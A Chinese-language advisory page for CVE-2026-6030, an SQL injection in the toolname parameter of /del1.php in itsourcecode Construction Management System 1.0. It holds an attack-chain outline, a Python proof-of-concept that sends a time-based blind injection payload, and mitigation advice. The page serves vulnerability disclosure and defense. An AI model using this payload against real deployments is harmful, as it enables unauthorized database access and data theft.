CVE-2026-6030 CVSS 6.3 中危

CVE-2026-6030: itsourcecode系统SQL注入漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6030

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Construction Management System

漏洞概述

itsourcecode Construction Management System 1.0被曝出存在SQL注入漏洞（CVE-2026-6030）。该漏洞位于/del1.php文件中，由于未对用户传入的toolname参数进行有效过滤，导致攻击者可注入恶意SQL语句。此漏洞可被远程利用，且无需用户交互，可能导致敏感数据泄露、篡改或系统服务中断，建议尽快修复。

技术细节

该漏洞的核心在于itsourcecode Construction Management System 1.0的/del1.php文件存在严重的输入验证缺失。系统在处理删除或查询功能时，直接从HTTP请求中获取toolname参数，并未对其进行任何形式的安全过滤、转义或参数化处理，而是直接拼接到后端数据库的SQL查询语句中。这种不安全的编码方式为SQL注入攻击提供了条件。根据CVSS 3.1向量分析，该漏洞攻击复杂度低（AC:L），且无需用户交互（UI:N），仅需低权限账户（PR:L）即可通过网络（AV:N）发起攻击。攻击者可以通过发送特制的HTTP请求，利用UNION SELECT查询提取敏感信息，或使用基于布尔/时间的盲注技术获取数据。成功利用此漏洞可能导致数据库被完全控制，造成敏感信息泄露、数据篡改或服务拒绝，严重威胁系统的安全性。

攻击链分析

STEP 1

信息收集

攻击者使用扫描工具或手动确认目标服务器运行的是itsourcecode Construction Management System 1.0版本。

STEP 2

漏洞探测

攻击者访问/del1.php端点，并在toolname参数中输入单引号或特定SQL语法，观察服务器响应是否异常或报错。

STEP 3

载荷构造

根据探测结果，构造恶意的SQL注入Payload（如UNION查询或布尔盲注语句），旨在提取数据库表结构或敏感数据。

STEP 4

攻击执行

利用低权限账户向服务器发送包含恶意Payload的HTTP POST请求，参数注入到toolname字段。

STEP 5

结果获取

分析服务器返回的HTTP响应或响应延迟时间，解析出数据库中的用户名、密码哈希或其他敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://target-ip/del1.php"

# SQL Injection Payload
# Attempting to bypass logic using 'OR 1=1' or time-based blind
payload = {
    "toolname": "test' OR SLEEP(5)-- "
}

try:
    print("Sending payload to %s..." % target_url)
    response = requests.post(target_url, data=payload, timeout=10)
    
    # Check if the response time indicates a successful blind injection
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed! The application responded with a delay.")
    else:
        print("[-] Vulnerability not confirmed via timing, check response content manually.")
        print(response.text)
        
except requests.exceptions.RequestException as e:
    print("[!] Error connecting to target: %s" % e)

影响范围

itsourcecode Construction Management System 1.0

防御指南

临时缓解措施

在Web应用防火墙（WAF）中添加针对/del1.php接口toolname参数的SQL注入防护规则；如果该功能非必须，建议暂时禁用/del1.php文件的访问权限或从服务器移除，直至官方补丁发布。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6030
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6030
3 Details https://www.cvedetails.com/cve/CVE-2026-6030/
4 VulDB https://vuldb.com/cve/CVE-2026-6030
5 Link https://github.com/ltranquility/submit/issues/9
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/submit/795444
8 Link https://vuldb.com/vuln/356606
9 Link https://vuldb.com/vuln/356606/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表